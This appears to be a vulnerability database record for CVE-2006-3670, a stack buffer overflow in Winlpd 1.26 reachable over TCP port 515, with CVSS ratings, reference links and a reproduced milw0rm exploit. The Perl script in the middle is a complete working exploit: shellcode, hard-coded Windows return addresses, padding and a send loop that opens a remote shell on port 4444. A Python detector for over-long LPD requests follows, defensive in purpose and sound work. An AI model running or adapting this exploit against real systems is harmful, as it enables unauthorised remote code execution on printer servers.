CVE-2006-3670
CVSS 7.5
Published: 2006-07-18 11:47:00
Revised: 2011-03-07 21:39:11

[Original] Stack-based buffer overflow in Winlpd 1.26 allows remote attackers to execute arbitrary code via a long string in a request to TCP port 515.


[CNNVD] Rabox WinLPD Remote Buffer Overflow Vulnerability (CNNVD-200607-255)

Winlpd 1.26 contains a stack-based buffer overflow. A remote attacker can execute arbitrary code by sending a long string in a request to TCP port 515.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions were found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3670
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3670
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-255
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2006/2823
(UNKNOWN)  VUPEN  ADV-2006-2823
http://secunia.com/advisories/21058
(VENDOR_ADVISORY)  SECUNIA  21058
http://foro.elhacker.net/index.php/topic,131756.htm
(UNKNOWN)  MISC  http://foro.elhacker.net/index.php/topic,131756.htm
http://xforce.iss.net/xforce/xfdb/27759
(UNKNOWN)  XF  winlpd-long-request-bo(27759)
http://www.securityfocus.com/bid/19011
(UNKNOWN)  BID  19011
http://www.securityfocus.com/archive/1/archive/1/441302/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060727 Buffer Overflow Vulnerability in Winlpd
http://www.osvdb.org/displayvuln.php?osvdb_id=27332
(UNKNOWN)  OSVDB  27332
http://securitytracker.com/id?1016510
(UNKNOWN)  SECTRACK  1016510
http://milw0rm.com/exploits/2014
(UNKNOWN)  MILW0RM  2014

- Vulnerability information

Rabox WinLPD Remote Buffer Overflow Vulnerability
Severity: High   Type: Buffer overflow
Dates: 2006-07-18 00:00:00   2006-07-20 00:00:00
Attack position: Remote
Winlpd 1.26 contains a stack-based buffer overflow. A remote attacker can execute arbitrary code by sending a long string in a request to TCP port 515.

- Advisories and patches


- Vulnerability information (2014)

Winlpd 1.2 Build 1076 Remote Buffer Overflow Exploit (EDBID:2014)
Platform: windows   Type: remote
Date: 2006-07-15   Verified
Port: 515   Author: Pablo Isola
#!/usr/bin/perl

####################################################
#
# A proof of concept Remote Buffer Overflow Exploit
#
# App Vulnerable: Winlpd 1.2 Build 1076 - rabox.com
#
# Possible problems with WinXP: if the exploit doesn't
# work correctly, try another number in var 'loop'.
#
# Buffer size 524 bytes. 
#
# Author: Pablo Isola - neuquencapital@hotmail.com
#
# Neuquen - Patagonia Argentina.
#
# To my friend 'Esteban T.' and all of my friends...
# you know who you are.
#
# Bug Discussion: http://foro.elhacker.net/index.php/topic,131756.htm
####################################################

use Getopt::Std;
use Socket;
my $SOCKET = "";

$loop = 51;  # 51 for Windows 2K and 100 to 120 for Windows XP 
$host = $ARGV[0];
$port = 515;


if (!defined $host){

	print "Error in Params.\n";
	print "Usage: winlpd_exp.pl [host] \n";
	print "Open remote shell on port 4444\n"; 
	exit;
}


print "\nA Remote Buffer Overflow Exploit\n".
"Coded by Pablo Isola - neuquencapital\@hotmail.com\nNeuquen - Patagonia Argentina\n\n";


$sc  = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66";
$sc .= "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6";
$sc .= "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa";
$sc .= "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f";
$sc .= "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb";
$sc .= "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba";
$sc .= "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb";
$sc .= "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc";
$sc .= "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61";
$sc .= "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70";
$sc .= "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44";
$sc .= "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7";
$sc .= "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69";
$sc .= "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9";
$sc .= "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0";
$sc .= "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3";
$sc .= "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7";
$sc .= "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0";
$sc .= "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67";
$sc .= "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1";
$sc .= "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0";
$sc .= "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88";
$sc .= "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d";
$sc .= "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95";
$sc .= "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2";

#0x77817477 return address for Windows 2K Professional 5.0.2195 SP4 Spanish
#0x77A12553 return address for Windows XP Professional 5.1.2600 SP1 Spanish

$ret = "\x77\x74\x81\x77";  # return address
$nop = "\x90" x 16;         # nops for padding
$str = "\x41" x 524 .$ret.$nop.$sc;

$iaddr = inet_aton($host)           || die "Unknown host: $host\n";
$paddr = sockaddr_in($port, $iaddr) || die "sockaddr_in: $!\n";
$proto = getprotobyname('tcp')      || die "getprotobyname: $!\n";

for ($j=1;$j<$loop;$j++) {
	
	socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!\n";
	connect(SOCKET,$paddr) || die "Lost Connection: $! .........ay Carumba?\n";
	send(SOCKET,$str, 0)	|| die "failure sent: $!\n";
	print "\nSending string: ".$j;
#	print "\nview:\n".$str."\n";
	sleep(1);
	close SOCKET;
	sleep(1);
}

print "\n\nTry: telnet remote_ip 4444\n\n".
"To my friend 'Esteban T.' and to all of my friends...you know who you are.\n".
"Have a nice day :)\n\n"; 

# milw0rm.com [2006-07-15]
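A defender-side check for the oversized port-515 requests this record describes, added here as an example; it is not code from the page, from Rabox, or from the exploit author. It parses the RFC 1179 request line that an LPD daemon reads first, names the command byte, and flags a line longer than 524 bytes (the buffer size stated in the exploit comments above, used here as an assumed threshold rather than a vendor-documented limit), non-printable bytes in the operand field, and a long run of a single padding byte. Both sample payloads are constructed; the oversized one carries filler only, no shellcode.

```python
"""Flag over-long LPD (RFC 1179) requests of the kind CVE-2006-3670 describes.

Added example, not code from the page or from the exploit author. It is a
passive check for captured TCP/515 payloads (for example from a packet capture
or an IDS preprocessor); nothing here sends traffic.
"""

# RFC 1179 daemon command codes: the first byte of the request line.
LPD_COMMANDS = {
    0x01: "print-any-waiting-jobs",
    0x02: "receive-printer-job",
    0x03: "send-queue-state-short",
    0x04: "send-queue-state-long",
    0x05: "remove-jobs",
}

# Assumed threshold: the 524-byte buffer size stated in the exploit comments.
MAX_SAFE_REQUEST = 524


def inspect_lpd_request(payload: bytes, max_len: int = MAX_SAFE_REQUEST) -> dict:
    """Parse the first request line of an LPD session and report anomalies.

    Returns the decoded command name (None if unknown), the length of the
    request line without its terminator, and a list of reasons the request
    looks suspicious (empty for a well-formed, normal-sized request).
    """
    reasons = []
    # An RFC 1179 request is one line terminated by LF.
    line, sep, _rest = payload.partition(b"\n")
    if not sep:
        reasons.append("request line not LF-terminated")
    if not line:
        reasons.append("empty request")
        return {"command": None, "length": 0, "reasons": reasons}

    code = line[0]
    command = LPD_COMMANDS.get(code)
    if command is None:
        reasons.append(f"unknown command byte 0x{code:02x}")

    if len(line) > max_len:
        reasons.append(f"request line {len(line)} bytes exceeds {max_len}")

    # Legitimate operands (queue name, agent, job list) are printable ASCII;
    # raw high bytes or long runs of one byte are overflow padding signatures.
    body = line[1:]
    if any(b < 0x20 or b > 0x7E for b in body):
        reasons.append("non-printable bytes in operand field")
    if len(body) >= 64 and len(set(body[:64])) == 1:
        reasons.append("64+ byte run of a single byte (padding pattern)")

    return {"command": command, "length": len(line), "reasons": reasons}


def is_suspicious(payload: bytes) -> bool:
    """True if the request line triggers any of the checks above."""
    return bool(inspect_lpd_request(payload)["reasons"])


# Constructed sample: a benign "receive printer job" request for queue "lp".
BENIGN_REQUEST = b"\x02lp\n"

# Constructed sample modelled on the layout of the exploit above: a long run
# of 'A', a NOP-like run, then some high bytes as filler. No real shellcode.
OVERLONG_REQUEST = b"\x02" + b"A" * 524 + b"\x90" * 16 + bytes(range(0x80, 0xA0)) + b"\n"

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN_REQUEST), ("overlong", OVERLONG_REQUEST)):
        print(name, inspect_lpd_request(pkt))
```

The length check alone would already catch the payload this exploit sends; the printable-ASCII and padding-run checks are there so that a request shorter than the threshold but clearly not a queue name (for example one padded to probe a smaller buffer) is still surfaced.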

- Vulnerability information

27332
Winlpd Long Request Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-07-15 Unknown
2006-07-15 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
